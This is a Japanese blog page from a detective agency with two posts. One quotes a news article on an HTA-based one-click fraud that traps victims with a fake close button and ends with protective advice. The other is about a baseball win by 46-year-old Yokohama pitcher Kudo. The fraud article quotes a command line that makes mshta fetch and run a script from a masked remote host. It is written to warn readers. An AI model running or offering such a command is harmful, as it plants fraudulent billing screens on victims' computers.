ワンクリック詐欺②



(上記はイメージです。)

"「×」で高額請求、巧妙なワンクリック詐欺"(YOMIURI ONLINEより)

引用~


 恐ろしいほど手が込んだワンクリック詐欺が登場している。動画の「閉じる」ボタンで不正なプログラムを実行させ、ウィンドウズのセキュリティー設定を突破して、高額請求画面を毎回デスクトップに出すものだ(テクニカルライター・三上 洋)

 アダルトサイトに多いワンクリック詐欺は、動画や画像を表示するだけで勝手に入会させたように見せかけ、高額料金を請求する詐欺だ。以前の記事「消えないアダルトサイト画面」「ワンクリック詐欺が再び急増」で手口や対策を紹介している。これまではクリックするだけで「8万円を払ってください」などと表示する単純なものが多かった。

 ところが、一部の詐欺業者が手の込んだワンクリック詐欺を仕掛けてきている。セキュリティー対策大手のトレンドマイクロが、自社のブログでその手口を詳しく解説している。「HTAを利用したワンクリックウエアの新たな手口」によると、今回の手口は今までに類を見ない悪質で巧妙な手段を使っている。

 まず初期の段階では、ワンクリックでの強制入会はさせずに、年齢確認や利用規約の同意などの表示を出す。繰り返し「はい」をクリックさせることで、後の脅迫的な請求を本物らしく見せるためだ。これについてトレンドマイクロでは「電子消費者契約法を意識したものではないか」とコメントしている。

 動画のダウンロードをしようとすると、動画本体のファイルではなく、拡張子がHTAとなっているファイルがダウンロードされる。この「HTA」はHTML Applicationの略で、HTML言語を使ってプログラム同様の動きをするファイルのこと。もしダウンロードしたファイルが「EXE」などの実行形式であれば、警戒してクリックしない人が多いだろう。しかし、一般的なHTML言語を使った「HTA」なので、そのままクリックしてしまう人も出てくる。

 そのHTAファイルをダブルクリックした状態が左の画面だ。画面中央に動画の再生ボタンのようなものが表示され、繰り返しアダルト動画が再生される。ただし、ウィンドウは固定されて操作もできないようになっている。多くの人は仕方なく、右上の「×」マーク、つまり「閉じる」ボタンを押すだろう。

 ところが、この「閉じる」ボタンに罠がある。実はこの「×」マークは単なる画像ファイルであり、クリックすると「入金完了ページ」に飛ぶようになっていた。「ご入会ありがとうございました。○○万円を今すぐ振り込んでください」という、ワンクリック詐欺ではおなじみの脅迫画面が表示される。「閉じる」ボタンのように見せかけて、実は詐欺業者が用意しただましページへのリンクだったのだ。

 この詐欺業者は、さらに手の込んだことをしている。「×」マークを押してしまうと、詐欺業者によるページにジャンプし、ここでVBスクリプトと呼ばれるファイルを実行する。このスクリプトは以下の通りだ。

「mshta http://xxxxxxxx.com/regist2.php」

 最初に表示されている「mshta」とは、ウィンドウズのシステムファイルで、セキュリティー設定を無効にした状態で指定のサイトにアクセスさせるもの。インターネットエクスプローラーなどのブラウザーでは実行をブロックできるが、今回はパソコンに保存されたHTAファイルによるものなので実行できてしまう。これによりウィンドウズの初期設定(レジストリー)に、高額料金請求の画面が登録されてしまう。レジストリー設定を直さない限り、起動するたびにワンクリック詐欺の画面が出ることになる。

 クリックさせやすいファイルを使い、閉じるボタンで偽装し、暗号化したコードで実行し、セキュリティー設定を突破してウィンドウズの初期設定に登録するという、何とも巧妙な手段だ。トレンドマイクロの調べによれば、この手法は「国内サーバーの複数のサイトで使われており、詐欺サイトを量産することで多くの被害者を集めようとしているようだ」とのことだ。
対策は「クリックしないこと」

 これらのワンクリック詐欺への対策として、トレンドマイクロでは四つのポイントを紹介している。
・不審なサイトへはアクセスしないこと
・適切なペアレンタルコントロール(使用者が未成年の場合の保護者が利用制限)を実施すること
・安易なクリックをやめ、警告文にしっかりと目を通すこと
・セキュリティー対策製品を最新の状態に保ち保護すること

 もし間違ってクリックした場合は、絶対にお金を払ってはいけない。デスクトップに表示されたとしても焦らずに、下記の参考サイトを見て冷静に対応・復旧しよう。

~引用



以前に、ワンクリック詐欺をお伝えしましたが、
これはさらに詳しく仕掛けが解説されています。

動画を見るために、
クリックさせたり、ダウンロードが必要と、
表示するサイトが多いので、
注意が必要ですね。


詐欺解決方法に関心があればこちらへ
     ↓
詐欺解決WEB


(調査員トリー)
T.I.U.総合探偵社

ランキングです。
クリックお願いします。 → 人気blogランキング
コメント ( 0 ) | Trackback ( 0 )

おじさん勝利

横浜・工藤、46歳20日セ界最年長勝利!(サンケイスポーツ) - goo ニュース

~引用 

 (交流戦、横浜6x-5楽天、2回戦、1勝1敗、25日、横浜)現役最年長選手の横浜・工藤公康投手(46)が25日、楽天2回戦(横浜)で2年ぶりの勝利を挙げ、自らが持つセ・リーグの最年長勝利記録を更新した。4番手で九回を3者凡退に仕留めると、チームはその裏に逆転サヨナラ勝ち。左腕は通算勝利数を223勝とし、村山実(阪神)を抜いて単独13位となった。

 久しぶりに呼ばれた本拠地のお立ち台で、大歓声を浴びた。プロ28年目の工藤が、2007年9月26日の阪神戦(横浜)以来、607日ぶりの勝利。5月5日に誕生日を迎えた現役最年長(46歳20日)が中継ぎでつかんだ格別の白星だ。

 「いつも試合をつくってくれる(先発の)マストニーの調子がよくなくて、中継ぎ陣が頑張ろうと力を合わせた。木塚、吉見がいい投球でつないでくれた結果です」と、自分の勝ち星よりチームの勝利をよろこんだ。

引用~



昨日のベイスターズ、見事サヨナラ勝ちでした。

そして、勝利投手は46歳工藤。
今期初勝利。
セリーグの最年長勝利投手だそうです。

まあ、試合は楽天相手にシーソーゲーム。
先制されて逆転して逆転されて同点に追いついて突き放されて
んで、最終回に逆転サヨナラ勝ち。

サヨナラのヒットを放ったのは内川でしたけど
まあ、綺麗なヒットではなく、ギリギリな感じでした。

しかし、良かった。
同じチームに連敗するのは良くないですからね。
2連戦が続く交流戦ですから、各カード最低1勝1敗でいけば
とりあえずマイナスにはならないので・・・。

それに、たぶんパリーグの方が強いですから
5割で耐えてれば、他のセリーグのチームが落ちてくるでしょうし。。。

そういう意味でも昨日の試合は大事な試合でした。
先発のマストニーの調子は悪かったですけど
中継ぎ陣が踏ん張りましたしね。

最終回は相手のミスが出た感じでしたが
2点ビハインドの4回の攻撃ですね。
チャンスでバッターボックスには、ピッチャーの吉見。

で、この吉見が打者顔負けのタイムリーヒット。
しかもランナーで3塁に行ったときにはタッチアップで激走。

吉見の活躍で勝てた試合かなとも思いました。


まあ、とにかく、これで勢いに乗って
次の日本ハム戦もビシッと戦って欲しいですね。


ベイスターズ交流戦成績

3勝3敗。

交流戦貯金0。



ベイスターズ通算成績

16勝27敗。

借金返済まで、あと11勝。




(代表代理サザビー)

ランキングです。
クリックお願いします。 → 人気blogランキング

探偵興信所のT.I.U.総合探偵社/東京

探偵学校といえばT.I.U.探偵養成学校/東京
コメント ( 0 ) | Trackback ( 0 )